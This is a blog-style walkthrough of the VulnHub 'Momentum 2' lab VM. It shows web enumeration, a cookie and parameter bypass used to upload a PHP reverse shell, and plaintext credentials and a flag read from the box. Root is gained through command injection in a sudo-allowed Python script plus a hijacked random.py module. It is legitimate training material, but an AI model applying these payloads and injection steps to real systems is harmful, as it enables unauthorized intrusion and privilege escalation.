Vulnhub: MOMENTUM: 2
I was away again; but this time I didn’t even have a laptop. Still, I try to do something every day so I did a bit of OverTheWire on my phone. It’s hard to do some of it where you’re expected to resize a terminal window to take advantage of more or something like that, but Leviathan was doable and so I completed that. After that I got home again and did MOMENTUM: 2 from VulnHub.
Keywords : curl, bash, code review
It’s medium rated.
Ports
SSH and HTTP only.
HTTP
We need to do some enumeration here; there are a few things we need to find:
- http://192.168.1.240/dashboard.html is where we can upload files,
- http://192.168.1.240/owls/ is where we find our uploaded content, and
- http://192.168.1.240/ajax.php.bak is where we find our code to review
The last one I found with:
feroxbuster -u http://192.168.1.240 -w /usr/share/seclists/Discovery/Web-Content/merged-file -C 403 -x php,bak --no-recursion
What’s in our code?
//The boss told me to add one more Upper Case letter at the end of the cookie
if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
//[+] Add if $_POST['secure'] == 'val1d'
$valid_ext = array("pdf","php","txt");
}
else{
$valid_ext = array("txt");
}
// Remember success upload returns 1 This is relatively simple. We need to set a cookie but also figure out what it needs to be, and add a new parameter to our POST request. Before finding this file I had tried to defeat the upload filtering to no avail. Considering we need that cookie and parameter, it’s no wonder.
I use Burp Suite Intruder to find the last character of the cookie - it is ‘R’. Then I construct this request:
POST /ajax.php HTTP/1.1
Host: 192.168.1.240
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------136110921536555815714284481441
Content-Length: 5842
Origin: http://192.168.1.240
Connection: close
Cookie: admin=&G6u@B6uDXMq&MsR
Referer: http://192.168.1.240/dashboard.html
-----------------------------136110921536555815714284481441
Content-Disposition: form-data; name="secure";
val1d
-----------------------------136110921536555815714284481441
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
# etcPrivesc
At this point we’ve shelled the box and we get the password for our user:
www-data@momentum2:/home/athena$ ls -lash
ls -lash
total 32K
4.0K drwxr-xr-x 3 athena athena 4.0K May 27 18:26 .
4.0K drwxr-xr-x 4 root root 4.0K May 27 16:30 ..
4.0K -rw-r--r-- 1 athena athena 220 May 25 12:15 .bash_logout
4.0K -rw-r--r-- 1 athena athena 3.5K May 25 12:15 .bashrc
4.0K drwxr-xr-x 3 athena athena 4.0K May 27 16:58 .local
4.0K -rw-r--r-- 1 athena athena 807 May 25 12:15 .profile
4.0K -rw-r--r-- 1 athena athena 37 May 27 17:04 password-reminder.txt
4.0K -rw-r--r-- 1 root root 241 May 27 17:09 user.txt
www-data@momentum2:/home/athena$ cat pas
cat password-reminder.txt
password : myvulnerableapp[Asterisk]
www-data@momentum2:/home/athena$ cat us
cat user.txt
/ \
~ Momentum 2 ~ User Owned ~
\ /
---------------------------------------------------
FLAG : 4WpJT9qXoQwFGeoRoFBEJZiM2j2Ad33gWipzZkStMLHw
---------------------------------------------------
www-data@momentum2:/home/athena$
www-data@momentum2:/home/athena$ su athena
su athena
Password: myvulnerableapp*
athena@momentum2:~$ sudo -l
sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py
athena@momentum2:~$How can we exploit this? Let’s inspect the code:
athena@momentum2:~$ cat /home/team-tasks/cookie-gen.py
cat /home/team-tasks/cookie-gen.py
import random
import os
import subprocess
print('~ Random Cookie Generation ~')
print('[!] for security reasons we keep logs about cookie seeds.')
chars = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'
seed = input("Enter the seed : ")
random.seed = seed
cookie = ''
for c in range(20):
cookie += random.choice(chars)
print(cookie)
cmd = "echo %s >> log.txt" % seed
subprocess.Popen(cmd, shell=True)
athena@momentum2:~$We’ve got command injection on the ‘seed’ parameter, and I use it to create a new python random module:
athena@momentum2:~$ cd /home/team-tasks
cd /home/team-tasks
athena@momentum2:/home/team-tasks$ sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
<oot /usr/bin/python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : 2;bash -c 'touch random.py && chmod 777 random.py'
2;bash -c 'touch random.py && chmod 777 random.py'
SLhHfZUPTWW$WUGLDDWO
athena@momentum2:/home/team-tasks$ 2
athena@momentum2:/home/team-tasks$ printf 'import os\n' >> random.py
printf 'import os\n' >> random.py
athena@momentum2:/home/team-tasks$ printf 'os.system("/bin/bash");\n' >> random.py
<ks$ printf 'os.system("/bin/bash");\n' >> random.py
athena@momentum2:/home/team-tasks$ sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
<oot /usr/bin/python3 /home/team-tasks/cookie-gen.py
root@momentum2:/home/team-tasks# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
momentum2
Fri 09 Jul 2021 08:16:35 AM EDT
root@momentum2:/home/team-tasks#Boom.